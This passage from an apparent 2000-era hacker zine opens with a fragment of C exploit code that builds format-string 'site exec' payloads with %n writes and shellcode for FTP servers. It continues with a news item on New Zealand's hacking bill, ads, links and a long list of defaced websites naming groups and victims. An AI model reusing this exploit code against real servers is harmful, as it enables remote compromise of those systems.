&buf[strlen(buf)]; } for(i=0; i < eat; i++) { sprintf(ptr, "%%.f"); ptr = &buf[strlen(buf)]; } r1 = (retn & 0xff); r1 |= ((inicio & 0xff00) + 0x100); sprintf(ptr,"%%.%dd", r1 - inicio); ptr = &buf[strlen(buf)]; sprintf(ptr,"%%n"); ptr = &buf[strlen(buf)]; r2 = (retn & 0xff00) >> 8; r2 |= ((inicio & 0xff00) + 0x200); sprintf(ptr,"%%.%dd", r2 - r1); ptr = &buf[strlen(buf)]; sprintf(ptr,"%%n"); ptr = &buf[strlen(buf)]; r3 = (retn & 0xff0000) >> 16; r3 |= ((inicio & 0xff00) + 0x300); sprintf(ptr,"%%.%dd", r3 - r2); ptr = &buf[strlen(buf)]; sprintf(ptr,"%%n"); ptr = &buf[strlen(buf)]; r4 = (retn & 0xff000000) >> 24; r4 |= ((inicio & 0xff00) + 0x400); sprintf(ptr,"%%.%dd", r4 - r3); ptr = &buf[strlen(buf)]; sprintf(ptr,"%%n"); ptr = &buf[strlen(buf)]; sprintf(ptr,"%s",code3); ptr = &buf[strlen(buf)]; sprintf(ptr,"\n"); } void mkini(void) { char *ptr = buf; int i; memset(buf, 0, 1024); ptr = &buf[strlen(buf)]; sprintf(ptr, "site exec "); ptr = &buf[strlen(buf)]; for(i=0; i < strlen(code1);i++) { sprintf(ptr,"%c", code1[i]); ptr = &buf[strlen(buf)]; } for(i=0; i < eat; i++) { sprintf(ptr, "%%.f"); ptr = &buf[strlen(buf)]; } sprintf(ptr,"|"); ptr = &buf[strlen(buf)]; sprintf(ptr,"%%x-"); ptr = &buf[strlen(buf)]; sprintf(ptr,"%%x"); ptr = &buf[strlen(buf)]; sprintf(ptr,"\n"); } void mkalin() { char *ptr = buf; int i; memset(buf, 0, 1024); ptr = &buf[strlen(buf)]; sprintf(ptr, "site exec "); ptr = &buf[strlen(buf)]; for(i=0; i < strlen(code1);i++) { sprintf(ptr,"%c", code1[i]); ptr = &buf[strlen(buf)]; } for(i=0; i < eat; i++) { sprintf(ptr, "%%.f"); ptr = &buf[strlen(buf)]; } sprintf(ptr,"%%x"); ptr = &buf[strlen(buf)]; sprintf(ptr,"|"); ptr = &buf[strlen(buf)]; sprintf(ptr,"%%x"); ptr = &buf[strlen(buf)]; sprintf(ptr,"\n"); } void mksh(void) { char *ptr = buf; int r1, r2, r3, r4; int i; memset(buf, 0, 1024); ptr = &buf[strlen(buf)]; sprintf(ptr, "site exec "); ptr = &buf[strlen(buf)]; for(i=0; i < strlen(code1);i++) { sprintf(ptr,"%c", code1[i]); ptr = &buf[strlen(buf)]; } for(i=0; i < eat; i++) { sprintf(ptr, "%%.f"); ptr = &buf[strlen(buf)]; } r1 = (retn & 0xff); r1 |= ((inicio & 0xff00) + 0x100); sprintf(ptr,"%%.%dd", r1 - inicio); ptr = &buf[strlen(buf)]; sprintf(ptr,"|%%s"); ptr = &buf[strlen(buf)]; r2 = (retn & 0xff00) >> 8; r2 |= ((inicio & 0xff00) + 0x200); sprintf(ptr,"%%.%dd", r2 - r1 - 1); ptr = &buf[strlen(buf)]; sprintf(ptr,"%%x"); ptr = &buf[strlen(buf)]; r3 = (retn & 0xff0000) >> 16; r3 |= ((inicio & 0xff00) + 0x300); sprintf(ptr,"%%.%dd", r3 - r2 - 1); ptr = &buf[strlen(buf)]; sprintf(ptr,"%%x"); ptr = &buf[strlen(buf)]; r4 = (retn & 0xff000000) >> 24; r4 |= ((inicio & 0xff00) + 0x400); sprintf(ptr,"%%.%dd", r4 - r3 - 1); ptr = &buf[strlen(buf)]; sprintf(ptr,"%%x"); ptr = &buf[strlen(buf)]; sprintf(ptr,"%s",code3); ptr = &buf[strlen(buf)]; sprintf(ptr,"\n"); } void status(void){ printf("[ Using values: offset=%x eat=%i align=%i add=%x inicio=%x ]\n", toeip, eat, alin, retn, inicio); } // By The Dark Raver @HWA 349.0 [IND] Nov 2000 : Opposition to New Zealand hacking bill mounts ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.newsbytes.com/news/00/158161.html By Adam Creed, Newsbytes WELLINGTON, NEW ZEALAND, 15 Nov 2000, 12:23 AM CST The New Zealand Greens political party has voiced its opposition to a planned amendment to the country's crime bill that could allow security services to hack into citizens' computers and intercept e-mail and faxes. The long-awaited legislation is mainly intended to criminalize computer hacking in New Zealand. The country has been without specific legislation outlawing malicious hacking. While supporting the main thrust of the planned laws, the Greens do not want to support a law that also gives the police and security services the right to hack into computers and intercept e-mail and faxes. "We won't support interception powers for state agencies, which in the electronic area would be a considerable assault on people's privacy," said a Greens spokesperson, adding that such new powers would be much more open to abuse. "There are serious doubts that such interception would do much to catch criminals," he added. "Real villains can easily avoid detection through using disguised language, encryption, temporary Hotmail addresses, rerouters and unlisted mobile phones. Therefore the cost to public privacy might greatly outweigh the beneficial effect of catching more criminals." He said that "misuse" of the world-wide Echelon interception network already illustrated the potential for privacy violations. Information Minister Paul Swain responded to criticism of the proposed laws by calling for elected representatives to pass a motion that would table the amendment first. He said there would be time to debate the proposed laws when the Bill is referred back to Parliament. "However the overarching purpose of this (amendment) is to make hacking illegal in New Zealand ­ I think that is vital for every New Zealander who owns a computer. We need to send a strong message that hacking is not cool, it is not clever, it is a serious crime," Swain added. Reported By Newsbytes.com, http://www.newsbytes.com . 00:23 CST @HWA 999.9 [HWA] sp00ge! The hidden track. (Free stuff, tips and s3kr3t urls and shit) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Here's some cool urls, tips tricks and other shit that doesn't fit elsewhere. http://www.phonefree.com/ - Free calls pc-phone within us and pc-pc worldwide, also video and pay extra feature options and offers on hardware (headsets etc) check it. http://www.dialpad.com/ - Free calls pc-phone anywhere us <-> us sign up from anywhere in the world (use a US address) and make calls to anywhere in the US so its great for foreign users wanting to call US destinations for free over the net.. ;) Not much here, I held back a lot of goodies for the next issue, watch this space for 'secret' sites and hints and tip sites. - Ed @HWA AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ____ _ _ _ ____ _ __ | __ )| | __ _| |_ __ _ _ __ | |_/ ___| ___| |/ _| | _ \| |/ _` | __/ _` | '_ \| __\___ \ / _ \ | |_ | |_) | | (_| | || (_| | | | | |_ ___) | __/ | _| |____/|_|\__,_|\__\__,_|_| |_|\__|____/ \___|_|_| | _ \ _ __ ___ _ __ ___ ___ | |_(_) ___ _ __ | |_) | '__/ _ \| '_ ` _ \ / _ \| __| |/ _ \| '_ \ | __/| | | (_) | | | | | | (_) | |_| | (_) | | | | |_| |_| \___/|_| |_| |_|\___/ \__|_|\___/|_| |_| §¤*~`~*¤§|§¤*~`~*¤§[ promo ur site or peddle ]§¤*~`~*¤§|§¤*~`~*¤§ ADVERTISING IS FREE TRY AND BE CREATIVE, HWA RESERVES RIGHT TO IGNORE YOUR REQUEST (THIS NEVER HAPPENS) READ BELOW FOR .COMS, SEND YOUR ADS TO CRUCIPHUX@DOK.ORG §¤*~`~*¤§|§¤*~`~*¤§[ your product... ]§¤*~`~*¤§|§¤*~`~*¤§ Ads run for ever or until i get sick of looking at them or they die or whatever. Commercial advertising is welcome we are read by several thousand people each issue, higher than some print publications.Payment is required for commercial ads, this can be monetary (cheque or money order made out to CASH sent to the mail drop listed earlier in the zine) or promo goodies or * merchandise, we would also be interested in aquiring sponsors to promote and fund a Hacker/Security CON in the Southern Ontario Canada area since most cons are south of the border and a Canadian con is LONG overdue. * Security/COMSEC/IT Networking/Internet related - cruciphux@dok.org §¤*~`~*¤§|§¤*~`~*¤§[ suck a sore buck ]§¤*~`~*¤§|§¤*~`~*¤§ "Nice boy, but as sharp as a sack of wet mice." -- Foghorn Leghorn ______ __ _ ___ ___ __ ______________ / __/ /_ ____ ___ / /_ | | /| / / | /| / / | /| / // ___/ ___/ __ \/ /_/ __/ / __ \/ _ \/ __/ | |/ |/ /| |/ |/ /| |/ |/ // /__(__ ) /_/ / __/ /__ / / / / __/ /_ |__/|__/ |__/|__/ |__/|__(_)___/____/\____/_/ \__(_)_/ /_/\___/\__/ CUBESOFT COMMUNICATIONS IS A PROUD SPONSOR OF THIS PUBLICATION * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ** * www.csoft.net webhosting, shell, unlimited hits bandwidth ... * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * * * http://www.csoft.net/ * * * * One of our sponsors, visit them now * * * * * * * * * ** * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * @HWA HA.HA Humour and puzzles ...etc =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Don't worry. worry a *lot* _ _ ___(_) |_ ___ ___ / __| | __/ _ Y __| \__ \ | || __|__ \ |___/_|\__\___|___/ SITE.1 -=- Fun =- http://www.howtoandroid.com/HowToBuildRobotHead.html Just go look :) ... - Ed -=- Hack/Security -=- http://root66.nl.eu.org {} (aka Frank) -=-= Tech/General -=- http://www.uk.research.att.com/vnc/ Got windows and need remote admin? check this out...non commercial. Cool site!, check it out, complete with interactive 'shell' to the root66 box...a must see. - Ed http://users.javanet.com/~alden/indexa.html phluid (phluid@mindless.com) Just stumbled across this and what a sweet looking site, you have to check it out just to dig the layout/graphics. Very nice, content? well have a look around, but do check it out ... - Ed http://www.securax.org/ (Belgium/Dutch) Submitted by: Zoa_Chien Nice site, well laid out but unfortunately for many of us its not in English :( ... check it out all the same, news, exploits, latest file list from packetstorm, HNN affiliate etc.. - Ed -=- Telephony -=- http://twpyhr.usuck.com . Jenny Very interesting site for the telephone enthusiast, has lots of rare and entertaining recordings of phone system screwups and general messages/ announcements etc, worth checking out, also check out the answering machine OGM collection :-) fun stuff. - Ed -=- Employment/Skill testing -=- http://www.brainbench.com/ Check out this site, test you sysadmin skills, even get certified online! post your stats to an online database and give the url to potential employers etc, lots of services ... a must see. - Ed http://cgisecurity.com/ Fledgling security site dealing with cgi and www vulnerabilities run by Zenomorph, very good site, much promise, lots of advisories and info well worth a visit if you admin a website. - Ed You can Send in submissions for this section too if you've found (or RUN) a cool site... @HWA H.W Hacked websites =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ___ ___ _ ___ _ _____ ___ ___ ___ _____ ___ ___ _ ___ ___ _____ / __| _ \ /_\ / __| |/ / __| \/ __|_ _|_ _| __/ __| | |_ _/ __|_ _| | (__| // _ \ (__| ' <| _|| |) \__ \| | | | | _|\__ \ |__ | |\__ \ | | \___|_|_Y_/ \_\___|_|\_\___|___/|___/___| |_| |___|___/____|___|___/ |_| +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |L|4|t|E|S|T|_|W|3|B|_|D|E|F|A|C|E|M|E|N|T|S| +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Muse: so where are the hacks with a point? defacing is synonomous with teenagers spray bombing urban walls with logos and gang colours it seems...what happened to HARP? (Enter GForce) * Hackers Against Racist Propaganda (See issue #7) [A = Articles accompany mirror]--[M = 'mass' hack]--[C = 'message' in HTML comments]--[K = Free Kevin reference] (back) November 2000 (forward) Date OS Group/Person AMCK Site 2000 ~~~~ ~~ ~~~~~~~~~~~~ ~~~~ ~~~~ ~~~~~~~~ [00.11.13] NT [m0r0n & nightman] Syscom Computing Ltd (www.syscom.co.il) [00.11.13] NT [m0r0n & nightman] Eshed Robotec Ltd (www.robotec.co.il) [00.11.13] NT [m0r0n & nightman] TAHAL (Tichnun Ha'Main Le'Israeel) (www.tahal.co.il) [00.11.13] Lr [hackweiser] Oskar (HK) (www.oskar.com.hk) [00.11.12] So [xessor] Jokes.com (www.jokes.com) [00.11.12] Lr [NiTR8] The University Of Isfahan (www.ui.ac.ir) [00.11.12] NT [Anti Sec. Hackers] C PhoenixNet Informatica LTDA (www.phoenixnet.com.br) [00.11.12] BI [BrainStorm] Marcel Franke (www.atacsis.de) [00.11.12] NT [prime suspectz] Biblioteca Leo Falicov (cabbib2.cnea.gov.ar) [00.11.12] NT [lion/type_o] Prime Bank, Pakistan (www.primebank.com.pk) [00.11.12] 2k [lion/type_o] Hafeez Centre (www.hafeezcentre.com.pk) [00.11.12] NT [tR|cky] Shavatz High School (www.savatz.givataim.k12.il) [00.11.12] Un [McM4nus] Conseils Delarive Holding (www.conseil-delarive.ch) [00.11.12] Bf [Havoc Korp] Elite Internet Clans (www.eliteclans.com) [00.11.12] Lr [hackweiser] House of Energy (HK) (www.houseofenergy.com.hk) [00.11.12] NT [Anti Security] C Comercial Săo Patricio Ltda. (www.bigbox.com.br) [00.11.12] NT [Anti Security] C Sebrae, Servico Brasileiro de Apoio a Empresa de P (www.ap.sebrae.com.br) [00.11.12] Li [prime suspectz] Governo do Estado de Rondonia (www.jaru.ro.gov.br) [00.11.12] IR [the nobodies] C Tsinghua University - Center of Atomic and Molecular Sciences (www.cams.tsinghua.edu.cn) [00.11.12] NT [Anti Security] C Prodemge Cia Proc Dados do Estado de Minas Gerais (www.ief.mg.gov.br) [00.11.12] NT [Brake^Off] Anes Condos and Villas rentals - Playa del Carmen (www.anes-condos.com.mx) [00.11.12] 2k [PHC] Jared Baker (www.jaredbaker.com) [00.11.12] NT [Brake^Off] Cancun Tours - Xel-Ha (www.xelha.com.mx) [00.11.12] NT [prime suspectz] M Colorado K12 Schools (primero.k12.co.us) [00.11.12] 2k [prime suspectz] Oficina Central de Estadística e Informática (www.ocei.gov.ve) [00.11.12] NT [CyberPunk] New Horizons Baja California (www.newhorizons.com.mx) [00.11.12] Ir [dhc] New York State Government primary Web site (www.state.ny.us) [00.11.12] NT [McM4nus] M Maerki, Baumann & Co AG (www.mbczh.ch) [00.11.12] 2k [predator] MC Warez Exchange (www.warezexchange.net) [00.11.12] NT [AntihackerlinK] Harian Umum Republika (www.republika.co.id) [00.11.12] 2k [IHA] Miller Imaging Juice Server (juice.millercd.com) [00.11.12] NT [m0r0n & nightman] Sivan-North Computer (www.sivan-north.co.il) [00.11.12] NT [m0r0n & nightman] Lantronics Computer Networking Ltd. (www.lantronics.co.il) [00.11.11] NT [McM4nus] Banco Colpatria (www.banco.colpatria.com.co) [00.11.11] NT [prime suspectz] Inprise (www.inprise.ca) [00.11.11] NT [IZ Corp] Massachusetts Institute of Technology (cliq.mit.edu) [00.11.11] NT [prime suspectz] Proderj - Centro de processamento de Dados do RJ (sintegra.sef.rj.gov.br) [00.11.11] NT [prime suspectz] Borland (CA) (www.borland.ca) [00.11.11] NT [xrev] Woops Ltda (www.woops.com.br) [00.11.11] 2k [prime suspectz] Home Page do Derba (www.derba.ba.gov.br) [00.11.11] NT [eniac] Museum of Alfons Mucha (www.mucha.cz) [00.11.11] Ir [r0b1n h00d slu7] Quelle (www.quelle.com.cn) [00.11.11] NT [McM4nus] Banco Agricola de El Salvador (www.bancoagricola.com) [00.11.11] Li [Crime Boys] Centro Pastoral, Educacional e Assistencial "Dom Carlos" (www.cpea.br) [00.11.11] Lr [fluffy bunny] M Knight Networking and Web Design (ww1.knightnetworking.com) [00.11.11] Lr [fluffy bunny] M Linear Systems, Inc. (lottohost.spiritusa.net) [00.11.11] So [Crime Boys] NETZONE,Co. Ltd (www.netzone.co.kr) [00.11.11] NT [frenet1k] Bradford College (bradford.edu) [00.11.11] NT [prime suspectz] Administracao do Porto de Săo Francisco do Sul (www1.apsfs.sc.gov.br) [00.11.11] NT [m0r0n/nightman] PC center (www.pc-center.co.il) [00.11.11] 2k [AntihackerlinK] PT. Texmaco Jaya (www.texmaco.co.id) [00.11.11] NT [IHA] Washington D.C. Department of Employment Services (mail.does.dcgov.org) [00.11.11] NT [ReDPriest] M Florida State University Center for Professional Development LAB (www.cpdlab.fsu.edu) [00.11.11] NT [tR|cky] Open University - Jerusalem (jccopenu.ac.il) [00.11.11] NT [ReDPriest] UIUC Department of Kinesiology (kines-freer.kines.uiuc.edu) [00.11.11] NT [tR|cky] Zefat Regional College (www.zrc.ac.il) [00.10.11] NT [Anti-401 Crew] M Outerline (www.outerline.com) [00.11.10] NT [ReALiSt] Infinity Egypt (www.infinity.com.eg) [00.11.10] NT [neon-lenz] Amsterdam Hotels (www.amsterdam-hotels.nl) [00.11.10] NT [prime suspectz] Naval Pacific Meteorology and Oceanography Center, Yokosuka, Japan (www.yoko.npmoc.navy.mil) [00.11.10] Ir [prime suspectz] Ultra Park Estacionamento e Lavarapido Ltda (www.tudofacil.com.br) [00.11.10] NT [prime suspectz] Governo Do Estado Do Mato Grosso (www.pgj.mt.gov.br) [00.11.10] NT [philer] Nichols Dollar Saver (www.nicholsdollarsaver.com) [00.11.10] NT [prime suspectz] US Bureau of Reclamation (www.mp.usbr.gov) [00.11.10] So [telconinjas] Scenewhores (www.scenewhores.net) [00.11.10] NT [prime suspectz] Bernalillo County (www.bernco.gov) [00.11.10] NT [philer] Sprout Communications (www.chiossone.com) [00.11.10] NT [prime suspectz] Governo Do Estado do Mato Grosso (servicos.detran.mt.gov.br) [00.11.10] NT [prime suspectz] Ebay Taiwan/a> (www.ebay.com.tw) [00.11.10] IR [Crime Boys] M Banco PSA Finance do Brasil S.A (www.bancopsa.com.br) [00.11.10] NT [HF] M BusinessNet (www.businessnet.com.ar) [00.11.10] NT [prime suspectz] #2 Technical Info, Jet Propulsion Labs (NASA) (techinfo.jpl.nasa.gov) [00.11.10] NT [Hackweiser] Hyundai Information Technology Co., Ltd. (www.hdcorp.hyundai.net) [00.11.10] Bf [Ne[r0] NTV Corp (moped.ntvi.ru) [00.11.10] NT [neon-lenz] Yellow-White (www.yellowwhite.nl) [00.11.10] Lr [hackweiser] Bagz (HK) (www.bagz.com.hk) [00.11.10] 2k [tR|cky] Western-Galilee College (wgalil.ac.il) [00.11.09] NT [prime suspectz] NEC (TW) (www.nec.com.tw) [00.11.09] Li [r0b1n h00d slu7] M Cooper Consulting (www.cooperconsulting.com) [00.11.09] NT [anti security] C TV Fronteira Paulista Ltda (www.tvfronteira.com.br) [00.11.09] NT [WiNeGuM] Bray County, Ireland (www.bray.ie) [00.11.09] Li [r0b1n h00d slu7] Bradley Development (www.circlecranch.com) [00.11.09] NT [prime suspectz] Visa International (www.visa.de) [00.11.09] NT [prime suspectz] ASICS Corporation (www.asics.co.jp) [00.11.09] Ir [prime suspectz] Integris (www.integris.com.br) [00.11.09] NT [HF] M Platao Servicos Graficos Ltda (www.aeroway.com.br) [00.11.09] NT [zigfred/hardcore] Servico Social Do Comercio-Sesc Ar/Rondonia (www.sesc-ro.com.br) [00.11.09] 2k [HackersFamily] Mash industria e comercio Ltda. (www.sabesabe.com.br) [00.11.09] NT [r00t.br] ACS (www.acs.co.il) [00.11.09] So [sil0] Electra2 (www.electra2.co.uk) [00.11.09] NT [m0r0n & nightman] Interwise Campus (www.interwise-campus.co.il) [00.11.09] NT [m0r0n & nightman] ScanMaster (www.irt.co.il) [00.11.09] So [sil0] Check Your Credit (www.checkyourcredit.co.uk) [00.11.09] NT [m0r0n & nightman] KIS Technologies (www.kis.co.il) [00.11.09] 2k [Reve|at|on] M Spattered Ink (spatteredink.com.au) [00.11.09] 2k [rapeworm] Eduk8 (www.eduk8.com.au) [00.11.09] 2k [rapeworm] All Clubs and Star Listings (allclubs.com.au) [00.11.09] NT [JaCo] Spendless (www.spendless.co.il) [00.11.08] IR [Anti Security] M Florida State University (www.iri.fsu.edu) [00.11.08] Bf [Crazy Horse] Peter Fielding Photography (www.mountainimagery.com) [00.11.08] 2k [prime suspectz] www.nasa.com.uy (www.nasa.com.uy) [00.11.08] NT [kbr] Governo Do Estado De Sao Paulo (www.fundap.sp.gov.br) [00.11.08] NT [Gforce Pakistan] Terminal - Computers & Multimedia (www.terminal.co.il) [00.11.08] NT [prime suspectz] Nextel Telecomunicacoes (www.nextel.com.br) [00.11.08] Ir [DHC] M SZ Audit (www.szaudit.org.cn) [00.11.08] NT [Gforce Pakistan] Rooster (mail.rooster.co.il) [00.11.08] Sc [Havoc Korp] New England Club Managers Association (www.necma.org) [00.11.08] NT [Gforce Pakistan] Radwiz (IL) (www.radwiz.co.il) [00.11.08] NT [Dcoder] Pilipino Telephone Corporation Official Website (homepage.piltel.com.ph) [00.11.08] UN [Halik] Government Printing Office (www.gpo.gov) [00.11.08] Li [r0b1n h00d slu7] Foto Concepts (www.foto-concepts.de) [00.11.08] [prime suspectz] Asics (www.asics.co.za) [00.11.08] NT [azndragon] EcoNet (dns.econet.it) [00.11.08] NT [m0r0n/nightman] Gvanim Financim, Kibutz Shefayim Israel (www.gvanim.co.il) [00.11.08] NT [m0r0n/nightman] Hed-Arzi (www.hed-arzi.co.il) [00.11.08] NT [tR|cky] MC Order in a Click (www.order-click.co.il) [00.11.08] NT [Gforce Pakistan] KIS Technologies (www.kisnet.co.il) [00.11.08] NT [aniclator] United States Geological Survey (mrdata.usgs.gov) [00.11.08] NT [Gforce Pakistan] Ornetix (ntserver.ornetix.co.il) [00.11.08] Ir [Crime Boys] Aiman Co (www.aimanco.com.cn) [00.11.08] Li [Web Claws] M Accueil Scorp - Motorsport (www.scorpmotorsport.com) [00.11.08] NT [Gforce Pakistan] Chamber (IL) (www.chamber.org.il) [00.11.08] NT [prime suspectz] Presidencia de la República de Mexico (www.presidencia.gob.mx) [00.11.08] [GForce Pakistan] University of Michigan Transportation Research Institute [00.11.08] Lr [pakistan is gay] Urmia University in Iran (mail.urmia.ac.ir) [00.11.08] NT [Anti-401 Crew] Toronto Zionist Council (www.torzc.org) [00.11.07] [Fenrir] TGIF Online (www.tgifonline.com) [00.11.07] Lr [philer] Detroit Tradesmen (www.detroittradesmen.com) [00.11.07] Bi [] Webdesign (www.opsaal.de) [00.11.07] NT [AnIcLaToR] Departamento Nacional de Producao Mineral (www.dnpm.gov.br) [00.11.07] NT [m0r0n/nightman] Efrat DSP Group (www.efratdsp.co.il) [00.11.07] NT [AnIcLaToR] Aneel-Agencia Nacional de Energia Eletrica (hidroweb.aneel.gov.br) [00.11.07] NT [m0r0n & nightman] Elgev Electronics (www.elgev.co.il) [00.11.07] NT [AnIcLaToR] Governo Do Estado De Sao Paulo (www2.fazenda.sp.gov.br) [00.11.07] NT [prime suspectz] #4 Australian Broadcasting Authority (www.aba.gov.au) [00.11.07] NT [RB Team] Ministerio de Comercio Exterior de Costa Rica (www.comex.go.cr) [00.11.07] Li [r00tshell] No BMW Syndrome (www.nobmwsyndrome.com) [00.11.07] NT [Anti Security] C DFM - FFCLRP - USP Ribeirăo (dfm.ffclrp.usp.br) [00.11.07] Li [r0b1n h00d slu7] M Scottish Right Dormitory (www.srd.org) [00.11.07] NT [ ] A Microsoft Events server (events.microsoft.com) [00.11.07] NT [thepr0digy] National Library of Australia (webpac.nla.gov.au) [00.11.07] NT [syf] M Gerber Landscape (www.gerberco.com) [00.11.06] NT [] C Republican National Committee (www.gop.org) [00.11.06] NT [ScorpionKTX] Confeccoes Simon-Brain Ltda (www.pitt.com.br) [00.11.06] So [GForce Pakistan] Torah Educator (www.toraheducator.org) [00.11.06] Li [GForce Pakistan] CentExchange (www.centexchange.com) [00.11.06] NT [prime suspectz] Partido Da Social Democracia (www.psdb.org.br) [00.11.06] Li [] Squadpage Online Gaming (www.squadpage.com) [00.11.06] Li [r0b1n h00d slu7] C Ball & Chain Industries (www.tonguejoy.com) [00.11.06] NT [prime suspectz] M Nintendo (ZA) (www.nintendo.co.za) [00.11.06] So [GForce Pakistan] Borha Torah (www.borhatorah.org) [00.11.06] NT [Prime Suspectz] Nintendo Mexico (www.nintendo.com.mx) [00.11.06] NT [] ICCU (iccu.sbn.it) [00.11.06] NT [anti security] C Web Tecnologia Servicos e Comercio (www.estudioweb.com.br) [00.11.06] Li [robin hood slut] The Robinson Group (www.theadmiral.com) [00.11.06] So [GForce Pakistan] Partners in Torah (www.partnersintorah.org) [00.11.06] Lr [hooyah] M Knowledge House Inc. (nsdev3.knowledgehouse.net) [00.11.05] IR [Ezkracho] Manuel Luis Zamudio Rodríguez (www.redmkt.com) [00.11.05] NT [prime suspectz] M MINISTERIO DO TRABALHO (www.mte.gov.br) [00.11.05] Li [r0b1n h00d] Hotel - Gasthof Kirchmayer (www.kirchmayer.de) [00.11.05] So [brain storm] STUDIO DE TATOUAGE CRYSTAL MAGIC ENR. (www.studiocrystalmagic.com) [00.11.05] Lb [g0mb0] InfoCon Mongola (www.infocon.mn) [00.11.05] So [GForce Pakistan] Jerusalem Books (www.jerusalembooks.com) [00.11.05] NT [prime suspectz] M Kenwood Chile (www.kenwood.cl) [00.11.05] Li [r0bb1n h00d] Blue Moon Security (www.bluemoonsecurity.de) [00.11.05] NT [lion & type_o] C Shaheed Zulfiqar Ali Bhutto Institute of Science and Technology (www.szabist.edu.pk) [00.11.05] NT [IHA] National Tax Association (www.ntanet.org) [00.11.05] NT [AnIcLaToR] M Zoomix Suplementaçăo Animal Ltda (www.zoomix.com.br) [00.11.05] 2k [brake off] James Raddock (www.raddock.com) [00.11.05] Li [Mr.P] M Kelley Studios (www.marilynfineart.com) [00.11.05] Li [EVIL ANGELICA] Mirage Television Productions (www.miragetv.com) [00.11.05] NT [prime suspectz] www.figc.it (www.figc.it) [00.11.05] NT [SqiSch/zEp] M E.C.C. Europe Class Computing S.r.l. (alessiamarcuzzi.com) [00.11.05] Lr [Di_QuIp] wizard.darkzone.trzepak.pl (wizard.darkzone.trzepak.pl) [00.11.05] So [GForce Pakistan] C All-Kosher Index™of the United Kashrut Authority (www.kosher.co.il) [00.11.05] NT [prime suspectz] M MCOM Diagnosticos por Imagem S/C Ltda (www.mama.com.br) [00.11.05] NT [Galahad] M Michlala L'hachsharat Morim (skbb4.skb2.macam.ac.il) [00.11.05] 2k [CyBeRpUnK] MC Professional Realty (www.berkeleycountyrealtor.com) [00.11.05] So [GForce Pakistan] Pirchei Shoshanim (www.pirchei.co.il) [00.11.05] So [GForce Pakistan] The Ultimate Shabbat Site (www.shabat.co.il) [00.11.05] So [GForce Pakistan] C World Peace Center (www.worldpeacecenter.org) [00.11.04] Lr [dodi] Cognifit (www.cognifit.co.il) [00.11.04] NT [Black Diamond] Abentel Comércio e Representaçăo Ltda (www.abentel.com.br) [00.11.04] Lr [CyBeRpUnK] MC Alphanet, S.A. de C.V. (www.virsem.com.mx) [00.11.04] Bf [Havoc Korp] www.surfootball.com (www.surfootball.com) [00.11.04] NT [azndragon] istituto agronomico mediterraneo (biopuglia.iamb.it) [00.11.04] Li [cid] Shenzhen SuperAsia Computer Technology Co.,Limited (www.csuu.com) [00.11.04] NT [crazy_bit] www.telekabel.at (www.telekabel.at) [00.11.04] Li [Havoc Korp] www.anarchy99.net (www.anarchy99.net) [00.11.04] NT [m0r0n/nightman] Bayan Systems, Israel (www.bayan.co.il) [00.11.04] NT [lion&type_o] Ministry of Agriculture, Iran (www.moa.or.ir) [00.11.04] Lr [DeTH] Brent Norman (www.ottawarcclub.com) [00.11.04] Li [Havoc Korp] www.katakombe.com (www.katakombe.com) [00.11.04] NT [philer] M Efficient Web Solutions, LLC (www.efficientweb.com) [00.11.04] NT [m0r0n/nightman] Automated Transaction System (www.caspit.co.il) [00.11.03] So [GForce Pakistan] C Shema Yisrael (www.shemayisrael.co.il) [00.11.03] So [GForce Pakistan] Jen Communications (www.jen.co.il) [00.11.03] So [GForce Pakistan] Health Infosystems Association, Israel (www.healthinfonet.co.il) [00.11.03] So [GForce Pakistan] Visiting Israel Students Association (www.visa.org.il) [00.11.03] IR [GForce Pakistan] Pf1 Systems Ltd. (www.pf1.co.il) [00.11.03] NT [rewben] the hehe.com e-mail service (www.hehe.com) [00.11.03] NT [rewben] Quantum Computer Services (www.myownemail.com) [00.11.03] Li [ipx] casemiro.castroalves.br (casemiro.castroalves.br) [00.11.03] NT [m0r0n] Yizrael Valley College (Mihlelet Emek Yizrael) (www.yvc.ac.il) [00.11.03] So [GForce Pakistan] Jewish Bible Association (www.jewishbible.org) [00.11.03] NT [predator] MC www.bos.cg.yu (www.bos.cg.yu) [00.11.02] NT [t3aM dANk] AMT (shop.amt1st.com) [00.11.02] NT [bunny] C www.motormarkt.nl (www.motormarkt.nl) [00.11.02] NT [WeB Claws] M www.costruzionesiti.com (www.costruzionesiti.com) [00.11.02] 2K [Lord Choo3s] FORIX - Formula One Results and Information eXplorer (www.forix.com) [00.11.02] So [Havoc Korp] Ravenous Groove Productions (www.ethereality.com) [00.11.02] Lr [EVIL ANGELICA] www.war247.com (www.war247.com) [00.11.02] Lr [CyBeRpUnK] MC SICA, S.A. DE C.V. (www.asofarma.com.mx) [00.11.02] Lr [Blitz] SimTel Computers DBA (www.simtelcomputers.com) [00.11.02] Lr [DeTH] SCM Labs, Inc. (www.scmlabs.com) [00.11.02] [Pakistan HC] The American Israel Public Affairs Committee (www.aipac.org) [00.11.02] 2K [grape/squirl] Arizona K12 Schools (ww2.chandler.k12.az.us) [00.11.02] Li [] Robert Essery (www.whyamisick.com) [00.11.02] Sc [RSH] M Cybernet (www.cybernetinc.net) [00.11.02] NT [Anti Security] Governo do Estado da Paraiba (ntiserv1.saude.pb.gov.br) [00.11.02] NT [m0r0n/nightman] Shenkar College (www.shenkar.ac.il) [00.11.02] NT [rewben] 